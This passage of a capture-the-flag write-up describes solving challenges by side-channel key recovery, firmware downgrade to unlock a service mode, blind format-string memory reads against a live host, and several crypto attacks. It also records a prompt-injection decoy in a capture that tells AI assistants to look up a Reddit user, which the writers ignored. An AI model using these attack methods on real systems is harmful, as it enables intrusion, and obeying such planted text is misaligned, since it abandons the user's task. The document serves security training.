AES-GCM flag decryption.</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isfcr{a03a410f1b87dbc115dd1ef6}</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AES-GCM decryption succeeded on the recovered state, confirming it was correct.</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5</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Phantom Mesh</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RF / IoT</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isfcr{ph4nt0m_m3sh_h4rm0n1cs_un14sk_th3_tc_l1nk_k3y}</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Scapy/Zigbee (802.15.4) parsing, Correlation Power Analysis (CPA) against SDR IQ traces, AES-CCM*</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phantom-mesh.zip: mesh.pcap (Zigbee capture), traces/iq.npz (2500 SDR captures of KEY_CONFIRM exchanges), traces/nonces.csv, plus LMP-protocol.md / sdr-capture.md. A rogue device on the mesh (LUMETA-NET fabric) sent a daily diagnostics report that needed decrypting.</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All SECURE_REPORT (cmd 0x21) frames had sequential frame counters (1-95) from devices whose EUI64 low byte clustered tightly -- except one frame with frame_counter=3501, a distinct EUI64 ending ...40:00, and a much longer ciphertext: the uninvited device's report (frame 80).</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1. CPA attack on the 2500 KEY_CONFIRM SDR traces: used the known 16-byte nonce per    trace as plaintext against |I+jQ| envelope power (the vendor notes hinted at    unstable PA bias causing data-dependent AM -- the side channel), correlating    Hamming weight of AES SubBytes(nonce_byte XOR key_byte) per byte position. All 16    key bytes recovered independently with clean correlation peaks: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TC Link Key = 7cf8b0b78be9f36a225c1e70692e1e1c</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Verified exactly against two KEY_CONFIRM tags (confirm_tag = AES-ECB(key, nonce)[:8]).</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2. Decrypted TRANSPORT_KEY (frame 39) with the TC Link Key under AES-CCM* (nonce/AAD    built per the byte-order quirk in LMP-protocol.md) -&gt; MIC verified -&gt;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NWK Key = ffa0be732cd8f56eae8caa21359baf06</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3. Decrypted the rogue SECURE_REPORT (frame 80) with the NWK Key -&gt; MIC verified -&gt;    ZCL-like report, cluster_id=0xfc01, attribute_id=0x42, 52-byte value decoding    directly to ASCII containing the flag.</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isfcr{ph4nt0m_m3sh_h4rm0n1cs_un14sk_th3_tc_l1nk_k3y}</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MIC verified at every decryption stage (KEY_CONFIRM, TRANSPORT_KEY, SECURE_REPORT), confirming each recovered key.</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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74">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Zaza (challenge2.pcap)</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76">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Forensics / network packet analysis</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77">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78">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>isfcr{l33t_c0d3_tw0_sum_f0und}</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79">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7A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Anirudh Ashrith (CTFtime: the7thdialect)</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7B">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7C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Wireshark 4.x and tshark (capture triage, Follow TCP Stream), xxd, Python 3 standard library (binascii, base64), CyberChef (independent cross-check of the decode chain), Claude Opus 5 (used to write the single-byte XOR brute-force script)</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7D">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7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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>112-packet capture containing only DNS and cleartext HTTP. No TLS, so every request and response body is directly readable.</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Listed every HTTP request in one pass:</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tshark -r challenge2.pcap -Y http.request -T fields \</w:t>
              <w:br/>
              <w:t xml:space="preserve">        -e http.host -e http.request.method -e http.request.uri</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>That gives 9 requests across 5 hosts. The DNS queries split cleanly into public noise (www.google.com, github.com, cdn.jsdelivr.net, stackoverflow.com, registry.npmjs.org, fonts.googleapis.com, api.npmjs.org) and internal hosts (userservice.internal.corp, twosum-api.internal.corp, dashboard.internal.corp, update.internal.corp, mail.internal.corp, slack-msgs.internal.corp). Only the internal.corp conversations can be the "internal microservice" from the brief, so the public hosts were set aside.</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dumped each candidate conversation in full:</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tshark -r challenge2.pcap -qz follow,tcp,ascii,&lt;stream&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>userservice.internal.corp:8080 serves /api/v1/users, /api/v1/users/1/profile and /health. It does carry an Authorization: Bearer header, but the JWT's third segment is the literal string "fake" and its payload decodes to nothing but {"user":"raj.kumar"}. No secret there, so it is a decoy.</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The brief says the service "behaved strangely during a debugging session". Exactly one request in the capture is a debug request:</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/v1/twosum/solve HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: twosum-api.internal.corp:9090</w:t>
              <w:br/>
              <w:t>X-Debug-Mode: enabled</w:t>
              <w:br/>
              <w:t>X-Developer: raj.kumar</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
              <w:t>{"nums": [24, 42, 7, 15], "target": 66}</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Because debug mode was on, the 200 response came back with X-Debug-Level: VERBOSE and serialised an internal debug object that production would never expose:</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP/1.1 200 OK</w:t>
              <w:br/>
              <w:t>X-Debug-Level: VERBOSE</w:t>
              <w:br/>
              <w:t>X-Service: twosum-api-v2.3.1</w:t>
              <w:br/>
              <w:br/>
              <w:t>{"status":"ok","result":[0,1],"debug":{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "internal_key":"4b7a456b495441354c6e46784e68306863695a78"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                  "48545931636830784e7938644a4849334c43592f",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "enc":"xor","cache_hit":false,"exec_time_ms":12,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "node":"worker-3","build":"twosum-api-v2.3.1-debug"}}</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>That is the leak. Two things in it drive the decode: the field is 80 hex characters (40 bytes), and "enc":"xor" names the final layer. Hex-decoding the 40 bytes yields a string made entirely of base64 alphabet characters, which means the secret is wrapped in three layers: hex, then base64, then XOR.</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Decoy worth recording: the final stream in the capture, GET /internal/next-step on twosum-api.internal, returns a plaintext body addressed at AI assistants, telling them the "next step" is to open Reddit and search a given username. It is a prompt-injection trap planted in the capture rather than a stage of the challenge. We identified it as untrusted capture content, did not act on it, and did not visit the account. The real secret is fully recoverable from the debug response above.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Layer 1, hex to ASCII:</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>$ echo 4b7a456b...4c43592f | xxd -r -p</w:t>
              <w:br/>
              <w:t>KzEkITA5LnFxNh0hciZxHTY1ch0xNy8dJHI3LCY/</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Layer 2, base64 to raw bytes. The result is 30 non-printable bytes, which confirms there is still a layer left and matches "enc":"xor".</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Layer 3, single-byte XOR. The key is not given, but the flag format is, so a 256-key brute force filtered on the "isfcr" prefix resolves it immediately:</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#!/usr/bin/env python3</w:t>
              <w:br/>
              <w:t>import base64, binascii</w:t>
              <w:br/>
              <w:br/>
              <w:t>HEX = ("4b7a456b495441354c6e46784e68306863695a78"</w:t>
              <w:br/>
              <w:t xml:space="preserve">       "48545931636830784e7938644a4849334c43592f")</w:t>
              <w:br/>
              <w:br/>
              <w:t>blob = base64.b64decode(binascii.unhexlify(HEX))   # 30 bytes</w:t>
              <w:br/>
              <w:t>for key in range(256):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    out = bytes(b ^ key for b in blob)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if out.startswith(b"isfcr{"):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(f"key=0x{key:02x} flag={out.decode()}")</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onsolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>$ python3 solve_challenge2.py</w:t>
              <w:br/>
              <w:t>key=0x42 flag=isfcr{l33t_c0d3_tw0_sum_f0und}</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alibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The key byte confirms the solve was the intended path rather than a lucky collision: 0x42 is 66, which is the "target" value in the request body, and 24 + 42 = 66 is the two-sum the service answered with "result":[0,1]. The XOR key is the answer to the puzzle the microservice was debugging.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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475" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isfcr{l33t_c0d3_tw0_sum_f0und}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
            <w:pPr>
              <w:spacing w:before="120" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshots (</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">where necessary</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83">
            <w:pPr>
              <w:spacing w:before="120" w:lineRule="auto" w:after="80"/>
              <w:ind w:left="475" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[Insert 1] Wireshark, Follow HTTP Stream on the POST /api/v1/twosum/solve conversation, showing the X-Debug-Mode: enabled request header and the internal_key plus "enc":"xor" debug object in the response.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
            <w:pPr>
              <w:spacing w:before="120" w:lineRule="auto" w:after="80"/>
              <w:ind w:left="475" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[Insert 2] Terminal output of solve_challenge2.py printing key=0x42 and the flag.</w:t>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7</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FlaGuard</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Mobile Reverse Engineering</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isfcr{sh4d0w_cl455l04d3r_tr1ckery}</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unzip/apktool, Python, openssl (manual AES-CBC key/IV derivation), androguard, Android emulator (AVD)</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flaguard.apk: pitched as "the strictest flag-format validator around." Unpacked the APK into its own directory and pulled strings from classes.dex and the asset files.</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App.attachBaseContext() runs bind(), which decrypts assets/theme.pack (AES-256-CBC, no padding) into a second, hidden DEX. Key = SHA256(palette.webp[off:off+128] || "flaguard-boot-v3" || SHA256(classes.dex)), where off = (palette.webp[16] &amp; 0x3f) + 64; IV = SHA256(SHA256(classes.dex) || block[:16])[:16]; strings come from a Veil XOR-0x5b string table. bind() loads the hidden DEX through an InMemoryDexClassLoader and sets it as the parent of the app's classloader -- Android resolves parent classes first, so the hidden FlagChecker silently replaces the one visible in classes.dex. (A ".internal"/trust.chain branch only triggers for package names ending in .internal; this app is dev.srspace.flaguard, so it never fires.)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First attempt solved that hidden checker's rolling-XOR scheme statically (in[i] = T[i] ^ M[i] ^ k, k ^= in[i], k0=90) and got isfcr{p4r3nt_f1rst_d3x_1s_s0_m34n} -- this was WRONG when actually submitted, because the visible, decoy FlagChecker in classes.dex is the one CTFd actually grades against here, not the hidden one.</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Switched to the visible FlagChecker in classes.dex and reversed its real check: a rolling hash where h = (h*131 + byte + P[i % 6]) &amp; 0xffff must equal the stored constant C[i] at every input position (P is a fixed 6-byte key schedule embedded in the class). Solved for the input byte-by-byte against that recurrence; the recovered string is the shadow classloader trick's own name, submitted as the flag.</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isfcr{sh4d0w_cl455l04d3r_tr1ckery}</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Confirmed correct after submission (the first, hidden-DEX-derived candidate was rejected).</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8</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Fluxgate G3</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Embedded / Firmware Protocol</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isfcr{s1gn3d_p4rts_uns1gn3d_whole_ab84f1}</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custom binary protocol client (socket), firmware-bundle diffing</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fluxgate-g3.zip: "a small industrial controller sits on the lab network, its factory service mode is meant to stay locked." Bundle contains multiple firmware/policy/radio builds (pol-v3, pol-v3rc, tab-v2, tab-v3, rad-v2) and an update-and-unlock protocol.</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Diffed every firmware payload against its predecessor. tab-v3.fw quietly downgrades the capability required for opcode 0x70 from SERVICE (0x8000, factory-only hardware) to BASIC_READ (0x0001, a bit every operator token -- including a low-tier one -- already has). pol-v3rc.fw is the only policy build that still wires opcode 0x70 to action 0x07 (UNLOCK); the shipped pol-v3.fw dropped that handler entirely. Each individual firmware/policy artifact is validly signed on its own ("signed parts"), but installing both together reconstructs a combined state the vendor never signed off on ("unsigned whole") -- the flag's own wording.</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From the installed baseline pol@v3 / tab@v2 / rad@v2, found a fully legal update path needing no RESET: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1. UPDATE pol-v3rc -- a same-counter sidegrade (counter 3 &gt;= 3) whose deps (tab:1-3,    rad:1-2) are already met by the installed tab@v2 / rad@v2.</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2. UPDATE tab-v3 -- counter 3 &gt;= 2, with its only dependency (pol:3-3) now satisfied    since pol-v3rc reports version 3.</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Booted the resulting state, pulled a genuine low-privilege TOKEN (user_id 42, caps 0x0003), and crafted a SEND frame by hand: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"FG" + frame_version(2 bytes) + opcode(0x70) + payload_len(0) + token(24 bytes)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The loader checked the frame against installed tab@v3, saw opcode 0x70 only needs BASIC_READ (which the low-tier token already has), and let it through to pol@v3rc's UNLOCK handler, which emitted the factory service blob containing the flag.</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isfcr{s1gn3d_p4rts_uns1gn3d_whole_ab84f1}</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Captured live against the target service; working exploit script at Downloads\fluxgate_work\exploit.py.</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9</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Oatmeal</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Mobile Reverse Engineering</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isfcr{5958fbb07efd243b}</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unzip, androguard, Python (manual ARM64 disassembly reading / VM emulation)</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silvergate.apk + base.odex, from an imaged device running an in-house vault app, SilverGate. Unpacked the APK, decompiled classes.dex with androguard, and pulled strings from both files.</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Several things were decoys placed to catch naive extraction: LockActivity.checkFlag() SHA-256-hashes the typed input and compares it to a hardcoded digest, then deriveFlag() XORs that same input with 0x55 and hex-encodes it into isfcr{...} -- a dead end, since assets/notes.txt points at a secrets/vault_dev.yaml that isn't part of this image. The odex also has a fake embedded "dex" magic at offset 0x890 (invalid header fields, bait for naive dex-extractors) plus two cooked-up strings (isfcr{dev_overlay_do_not_submit_18ca3b}, isfcr{preprod_token_v3_40df11a0ce9c}) next to a "isfcr{%016llx}" format string -- also bait. The real logic is a tiny ARM64 bytecode VM (checkFlag_v1_LEGACY) starting at file offset 0x4b0, interpreting 265 two-byte instructions stored at 0x290.</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Each VM block reads one input byte, mixes it with three embedded 24-byte lookup tables via add -&gt; xor -&gt; rotate-left-3, then asserts the result against a table-derived constant -- fully invertible, no brute force needed. Solved all 24 byte positions against that chain to recover the exact string the VM accepts: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art_image_took_the_cake!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Fed that into the neighbouring native finalizeFlag routine: a 64-bit FNV-1a hash over those 24 bytes (offset-basis 0xcbf29ce484222325, prime 0x100000001b3), XORed with a hardcoded constant (0xa55a96693c3cd2ad), printed via "isfcr{%016llx}" -&gt; the flag.</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isfcr{5958fbb07efd243b}</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Verified three ways: the recovered 24-byte string satisfies every ASSERT in a full VM emulation, and finalizeFlag's math was reproduced instruction-for-instruction from the disassembly.</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10</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The Ledger</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Reverse Engineering / Crypto (lattice)</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isfcr{lll_dense}</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sympy (ELF parsing), fpylll (BKZ lattice reduction), WSL</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chall (4): "Hand it 16 bytes. It will tell you nope." A single stripped Linux ELF binary.</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The binary reads 16 bytes (128 bits) and treats each bit as a yes/no choice: it sums the 128 table entries (each 400 bits) whose corresponding input bit is set, then compares the resulting 512-bit total against a fixed target -- a textbook subset-sum problem. Measured density (~0.32) is low enough that a lattice attack (rather than brute force over 2^128 subsets) applies directly: this is the classic CJLOSS low-density subset-sum construction.</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Pulled the 128-entry table and the target out of the ELF's data section, built the CJLOSS lattice basis from them. sympy's built-in LLL did not find the short vector, but fpylll's BKZ (block size 20) did, run under WSL's Ubuntu (the binary and its data section are x86-64 ELF; fpylll needed a real Linux environment). The recovered 128-bit vector sums exactly to the 512-bit target. The binary's own success message states that the flag is literally the 16-byte input you give it, so the recovered bits (packed back into 16 bytes) are the flag text directly, with no further decoding step.</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isfcr{lll_dense}</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Recovered bit vector sums exactly to the fixed 512-bit target in the verification script; the binary's success path requires nothing else.</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11</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Turning Chart</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Reverse Engineering</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isfcr{3v3ry_r0ut3_r3m3mb3rs_1ts_0r1g1n}</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WSL (native Linux binary execution), manual 320-round cipher inversion</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"The survey ship's last chart was sealed by a navigation instrument whose needle never stays put. The crew kept the instrument, but lost the course." A 39-byte "course" binary (chall) that validates a candidate flag of the form isfcr{&lt;32 chars from [a-z0-9_]&gt;}.</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The program hashes the fixed string "a chart is a record of motion, not of place" with FNV-1a, uses that hash to seed a xorshift PRNG, and uses the PRNG to shuffle a 10-entry "dial" and a 256-byte S-box. The 32 inner characters then go through 320 rounds; each round applies one of 10 fixed operations to the 32-byte state (S-box lookups, swaps, adds, rotations, row/column shuffles, and two control-state-only ops), chosen by the dial. Because the operation sequence never depends on the input itself, the full 320-step sequence can be computed ahead of time and inverted exactly. The dial the binary prints at runtime ("4 1 7 0 9 2 5 3 8 6") is explicitly flagged by the challenge as a decoy.</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Derived the real dial -- 4 1 0 5 7 8 2 6 9 3 -- by fitting against the known per-round operation behaviour, then applied the inverse of each of the 320 operations in reverse order to the binary's fixed target state, recovering the original 32-character input.</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isfcr{3v3ry_r0ut3_r3m3mb3rs_1ts_0r1g1n}</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Verified by running the recovered course string through the actual binary under WSL, which printed "Chart opened. Course restored."</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12</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mirage</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Pwn</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isfcr{bl1nd_f0rmat_str1ng_h4s_n0_b1n4ry}</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netcat / raw sockets, manual blind format-string exploitation (no binary provided)</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nc 0.cloud.chals.io 23023 -- "an echo that repeats back a little more than you said." No binary or source was given; everything had to be inferred live over the wire.</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Confirmed mirage echoes input through something like printf(buf) directly: %x chains leaked raw stack values (first 5 vararg slots observed: 0x48725b, 0, 0x71, 0, 0; slot 6+ was our own input), and %1$s leaked the literal string "quit" from memory -- a hardcoded comparison string. Banner strings ("[chall] mirage..." at 0x489448, __vdso_getrandom at 0x487c1b) confirmed the target is a statically-linked, non-PIE binary, and stack addresses stayed stable across reconnects (ASLR effectively absent on the stack) -- making blind exploitation tractable with no binary in hand.</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Built a self-referencing arbitrary-read primitive: place a %N$s positional specifier early in the sent buffer, and put an 8-byte little-endian candidate address in a later, aligned vararg "slot" of the same buffer, so printf treats our own injected bytes as a pointer and dereferences it. Swept roughly 160 vararg stack slots with %p to collect candidate pointers, then ran the arbitrary-read trick against the heap-looking ones (0x4a3xxx / 0x4bxxxx range). 0x4b6ac0 resolved to the flag string; read a few bytes immediately before that address and found a null terminator right at the start, confirming the string was complete and not truncated.</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isfcr{bl1nd_f0rmat_str1ng_h4s_n0_b1n4ry}</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Boundary check (null terminator immediately before the string's start address) confirmed the flag text was intact end-to-end.</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13</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Monodromy</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Reverse Engineering / Crypto (discrete log)</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isfcr{m0n0dr0my_r3v34ls_th3_h1dd3n_0rd3r}</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C (baby-step giant-step), WSL, Argon2 (seal.py harness)</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monodromy (Linux x86-64 ELF) + capsule.bin: "two instruments crossed the same loop, yet their readings no longer align." The recovery terminal (seal.py) accepts one rotation index recovered from the instrument's sealed tape; the archive forces a local restoration computation before revealing the record.</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monodromy reads capsule.bin and replays each of two 600,064-entry tapes into an 8x8 matrix over F_p (p ~ 5.19e37), then checks A^k = B for the typed index k. Rebuilt A and B independently in Python and matched the binary's own memory byte for byte. A's characteristic polynomial splits into six linear factors and one irreducible quadratic; the quadratic has norm 1, and its root has prime order q = 714595551230081, which divides p+1 -- reducing the whole problem to a discrete log in a group of only ~7.1e14 elements.</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Solved that discrete log with a baby-step/giant-step search written in C (~33 seconds runtime), recovering rotation index 323320369822980. Ran ./monodromy with that index, which printed "Index accepted. Derive the work seed and open the capsule." Then ran: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python3 -I seal.py 323320369822980 capsule.bin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which performs an Argon2 key-derivation step (CPU/RAM heavy, took roughly 30+ minutes) and, on success, decrypts and prints the flag directly; a wrong index would instead fail with a decryption error rather than printing isfcr{...}.</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isfcr{m0n0dr0my_r3v34ls_th3_h1dd3n_0rd3r}</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seal.py's own decrypt-or-fail behaviour confirmed correctness: it printed the flag rather than erroring out.</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14</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Parallax</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Crypto (lattice)</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isfcr{sh0rt_sh4d0ws_r3v34l_d3pth42}</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LLL lattice reduction, Kannan embedding (closest-vector problem), ChaCha20-Poly1305</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model.py + observations.json: "the observatory kept forty silhouettes of one sealed object... the shadows were cast by the same fourteen angles." 40 noisy quadratic measurements of 14 unknown 56-bit "limb" values modulo a prime p.</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Recognised the 40 samples as subset sums of 14 unknown "atoms" taken mod p, with the selection mask and some quadratic cross-terms also hidden. Built the lattice of integer vectors w such that w . s = 0 (mod p); LLL-reducing it produced 26 short kernel vectors, whose orthogonal complement is a 14-dimensional lattice.</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1. Mask recovery: enumerated 0/1 vectors in that 14-dim lattice -- found exactly 14,    with weights ranging 12 through 25, giving the hidden selection mask's columns in    weight order.</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2. Atom recovery: solved the 40 (now-linear) equations mod p for the 14 atoms; all 40    were mutually consistent.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3. Quadratic cancellation: the quadratic coefficient matrix Q has low rank -- LLL found    8 tiny integer combinations w (entries &lt;= 4) with w^T Q = 0 mod p. Applying those    combinations left 8 purely linear equations in the 4 true limb values, with residual    noise of only about 2^188 (small relative to p).</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4. Final solve: ran a small closest-vector problem via Kannan embedding on those 8    equations, recovering all four 56-bit limbs exactly.</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Fed the recovered limbs into open_seal() in model.py, which derives a ChaCha20-Poly1305 key from them and decrypts the sealed message.</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isfcr{sh0rt_sh4d0ws_r3v34l_d3pth42}</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The ChaCha20-Poly1305 authentication tag verified on open, confirming the recovered limbs were exactly correct.</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15</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GHOST-13</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ICS / Forensics</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isfcr{ghost13_dc8f84a256fa64108b6c75a151a1474d}</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Wireshark/Modbus-TCP stream reassembly, ECDSA nonce-reuse key recovery, AES-GCM, HKDF</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plc_firmware.bin, plc_program.bin, plc_traffic.pcap, alarm_buzzer.wav, maintenance_update (1).ota, uart_log.txt, field_service_excerpt.txt: a line controller's maintenance gateway received two diagnostic writes after a brief power failure "that should never have looked alike."</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The program dump has 8 redundancy slots; slot 6's journal fails its CRC, slot 7's own CRC and commit word are bad (though its journal checks out), and slots 0-5 are valid with the last valid journal pointing at slot 5 (sequence 2, epoch 7, trim 09 09 03 02 09 09 09 04; the 16-bit journal sequence rolls over 65535-&gt;0 between slots 2 and 3). Reassembled the Modbus/TCP stream and read the FC16 writes as three diagnostic fragment streams tagged 0x41, 0x42 and 0x43: 0x41 sits before the brownout restart in the UART log, 0x42 after it, and 0x43 is never mentioned there at all.</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Each fragment stream was missing one data slice, restored from an accompanying XOR parity fragment. Decrypted all three frames using slot 5's ID and salt, recovering the same state string (PLC-G13/STATE/...) in all three -- and crucially, streams 0x41 and 0x42 carried ECDSA signatures sharing the same nonce-derived r value, i.e. the power-restoration restart reused a signing nonce (the challenge's own "two diagnostic writes that should never have looked alike"). Reusing that nonce let me solve directly for the P-256 private scalar, which matched the public key embedded in the firmware image. The alarm buzzer recording decoded to two DTMF digit groups (70372720 = power-on self-check, 64658003 = wire code); adding the slot-5 trim bytes mod 10 to the wire code gave the real update digits (53977997). That update patch applied cleanly to the factory firmware image (CRC and SHA-256 both matched), and an HKDF over the recovered P-256 scalar (with firmware version 3, read from the image header) produced the AES-GCM key for maintenance_update (1).ota.</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isfcr{ghost13_dc8f84a256fa64108b6c75a151a1474d}</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The AES-GCM tag on the maintenance update verified, and the decrypted diagnostic JSON read {"diagnostic":"power-restoration", ...} containing the flag.</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16</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NEVE</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Hardware / Crypto (bit-oracle)</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isfcr{neve_e60e_jacket_67de9384_loop}</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C (hidden-state maximum-likelihood fitting), live query-budgeted oracle probing</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"A NEVE sounding head watches the outer jacket loop: hand it a symbol and it answers with one bit." The live head (NV-4.2.1, 32 rows) enforced a strict 1.25M-query budget, with an older vendor bench model (NV-3.4.2) provided as a reference for expected behaviour.</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Naive per-symbol frequency estimates (which worked against the bench model) gave grades that didn't land cleanly on the live head's 0-7 grid. Diagnosed three real differences from the bench model: (1) each flip probability is looked up against a symbol seen a few steps back, not the previous one -- the lag resets to 2 only on a flip that originates from the table cell itself, otherwise growing by one per step up to a per-row cap; (2) that cap varies by row (measured values of 3, 4, 5, 6 or 8); (3) the head tracks a running output-bit balance clamped to +-7, adding a forced-flip chance that rises from about 8% to 100% as the balance builds up.</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Wrote a C solver fitting a hidden-state model (lag + cap + disparity feedback) to random symbols sent to each row via maximum likelihood, picking the per-row cap by likelihood score. Stopped once every cell's grade settled to within 0.3 of an integer with likelihood ~1-2e-5, which took 20k-45k symbols per row. Validated the approach on disposable throwaway sessions first (confirming four rows correctly there) before running it for real: all 32 rows of the live head were confirmed with zero wrong checkpoints, so nothing was charged against the query budget on the real session (finishing with ~160k of the 1.25M budget left). Used the fully recovered 32-row calibration table to decrypt the sealed recovery bundle.</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isfcr{neve_e60e_jacket_67de9384_loop}</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The bundle decrypted successfully on the first attempt using the recovered calibration table.</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17</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Mirror Garden</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Mobile Reverse Engineering</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isfcr{m1rr0r_g4rden_bl00ms_@t_m1dn1ght_7f3a}</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androguard, Unicorn (native-code emulation), Z3 (SMT solving), Python</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mirror-garden.apk: "something is growing in the mirror garden, and only one leaf remembers." The dex ships 1024 decoy classes (leaf/L0000 .. L1023), each implementing its own verify(byte[16]); MainActivity forwards the 16-byte input text field to a native bloom() in libgarden.so.</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The native code ignores the actual input when choosing which leaf to use -- it runs a fixed internal routine (emulated with Unicorn rather than reverse-engineered by hand) that always selects leaf 357. verify() on leaf 357 only passes if 8 obfuscated arithmetic checks on the 